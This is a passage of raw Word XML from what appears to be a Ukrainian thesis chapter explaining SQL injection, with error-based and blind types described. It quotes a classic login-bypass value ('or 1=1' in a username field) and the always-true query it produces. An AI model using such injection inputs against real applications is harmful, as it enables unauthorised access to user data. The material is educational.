        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Active</w:t>
      </w:r>
      <w:r w:rsidRPr="002B7D87">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A7163">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Server</w:t>
      </w:r>
      <w:r w:rsidRPr="002B7D87">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A7163">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Pages</w:t>
      </w:r>
      <w:r w:rsidRPr="002B7D87">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7163">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ASP</w:t>
      </w:r>
      <w:r w:rsidRPr="002B7D87">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidRPr="005A7163">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>script</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> запускається на ISS веб сервері  є найкращим прикладом SQL-ін’єкцій. Передана інформація – це ім’я користувача та пароль. Для створення </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>SQLi</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>, атакуючий може надіслати наступне значення</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7163">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>у поле вводу програми, такі як ім’я користувача і пароль поля.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32C667B2" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRPr="005A7163" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A7163">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Username: Blash’ or 1=1 – </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0084DE67" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRPr="00D84A48" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A7163">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Password: Springfield</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0454B484" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRPr="00D84A48" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Як частина звичайного запиту виконання, ці вхідні значення замінять заповнювачів, а запит з'явиться наступним</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="409DEE0B" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRPr="005A7163" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A7163">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SELECT COUNT(*) FROM Users WHERE UserName=’Blash’ or 1=1 –‘ AND Password=’Springfield’;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C1E2EA" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Уважне вивчення цих запитів показує, що умови в реченні, завжди будуть істинними. Цей запит успішно виконається так як це не є синтаксичною помилкою, і це не порушення звичайного виконання запиту.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A2AE719" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRPr="00D84A48" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5AF09DD8" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRPr="00846B4C" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="576"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="48" w:name="_Toc516752129"/>
      <w:bookmarkStart w:id="49" w:name="_Toc30433113"/>
      <w:r w:rsidRPr="00846B4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>2.4 Типи SQL-ін’єкцій</w:t>
      </w:r>
      <w:bookmarkEnd w:id="48"/>
      <w:bookmarkEnd w:id="49"/>
    </w:p>
    <w:p w14:paraId="5BE459BC" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRPr="00D84A48" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62535B36" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRPr="00D84A48" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Атакуючий використовує різні види хитрощів і технік для перегляду, управління, вставлення, і видалення даних з додатку бузи даних. В залежності від техніки використання, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>SQLi</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> може мати декілька типів. Атакуючий використовує SQL ін’єкцію багатьма способами для отруєння SQL запиту.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32DEFF42" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Рис. 2.1 демонструє типи SQL-ін’єкцій.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FF35C3F" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRPr="00D84A48" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Різноманітні типи SQL-ін’єкцій включають:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2626AB7D" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRPr="00D84A48" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>SQLi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="348DA2A4" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRPr="00D84A48" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">В </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>SQLi</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>, атакуючий вводить зловмисний код через SQL запит, котрий може переглядати конфіденційні дані і навіть модифікувати (вставляти/ оновлювати/ видаляти) їх. Існує два основних типи SQL-ін’єкцій:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38A54B50" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRPr="00A419FD" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:suppressAutoHyphens/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A7163">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Error</w:t>
      </w:r>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7163">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>based</w:t>
      </w:r>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SQLi</w:t>
      </w:r>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00A419FD">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Атакуючий навмисно вставляє bad input (неякісні вхідні дані) в додаток, змусивши його вивести помилку бази даних. Атакуючий читає повідомлення про помилку і як результат знаходить SQL-ін’єкційну вразливість в додатку. На підставі цього, нападник вводить SQL запити, які спеціально розроблені для компрометації безпеки даних програми [19].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38471ED2" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRPr="00A419FD" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:suppressAutoHyphens/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A419FD">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Blind SQL injection. В сліпому введенні, атакуючий не має повідомлення про помилку від системи з якою він працює. Замість цього, атакуючий просто відправляє шкідливий SQL запит до бази даних.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B762134" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRPr="00D84A48" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1DE4833C" w14:textId="69EFE639" w:rsidR="00A419FD" w:rsidRPr="00D84A48" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5F64E0F3" wp14:editId="78A841C4">
            <wp:extent cx="4638040" cy="28822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8040" cy="2882265"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:solidFill>
                      <a:srgbClr val="FFFFFF"/>
                    </a:solidFill>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="628B693D" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Рис</w:t>
      </w:r>
      <w:r w:rsidRPr="007E3FD4">
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>. 2.</w:t>
      </w:r>
      <w:r w:rsidRPr="007E3FD4">
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="007E3FD4">
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ "Рисунок" \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="007E3FD4">
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="007E3FD4">
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="007E3FD4">
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> типи SQL-ін’єкцій</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19513E33" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRPr="007E3FD4" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5CCBF9BA" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRPr="00846B4C" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="993"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="50" w:name="_Toc516752130"/>
      <w:bookmarkStart w:id="51" w:name="_Toc30433114"/>
      <w:r w:rsidRPr="00846B4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">2.4.1 </w:t>
      </w:r>
      <w:r w:rsidRPr="00846B4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Error-based SQL injection</w:t>
      </w:r>
      <w:bookmarkEnd w:id="50"/>
      <w:bookmarkEnd w:id="51"/>
    </w:p>
    <w:p w14:paraId="18382E30" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRPr="00B00F3C" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E50A434" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">В </w:t>
      </w:r>
      <w:r w:rsidRPr="005A7163">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>error</w:t>
      </w:r>
      <w:r w:rsidRPr="00C11CBE">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7163">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>based</w:t>
      </w:r>
      <w:r w:rsidRPr="00C11CBE">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A7163">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00C11CBE">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A7163">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>injection</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>, атакуючий змушує базу даних викинути повідомлення про помил</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>ку в відповідь на його введення</w:t>
      </w:r>
      <w:r w:rsidRPr="00B07D68">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>[19]</w:t>
      </w:r>
      <w:r w:rsidRPr="00C11CBE">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> Пізніше, він має аналізувати повідомлення про помилку отриману з основної бази даних для збору корисної інформації, що може бути використана в конструюванні зловмисного запиту. Атакуючий використовує цей тип </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>SQLi</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> техніки коли він не в змозі використати безпосередньо будь-яку іншу техніку </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>SQLi</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">. Основна мета цієї техніки генерувати повідомлення про помилку з бази даних, що може допомогти у виконанні успішної </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>SQLi</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36B844A5" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRPr="007C1060" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="1276"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C39A4">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">2.4.1.1 </w:t>
      </w:r>
      <w:r w:rsidRPr="007C39A4">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>System</w:t>
      </w:r>
      <w:r w:rsidRPr="007C1060">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007C39A4">
        <w:rPr>
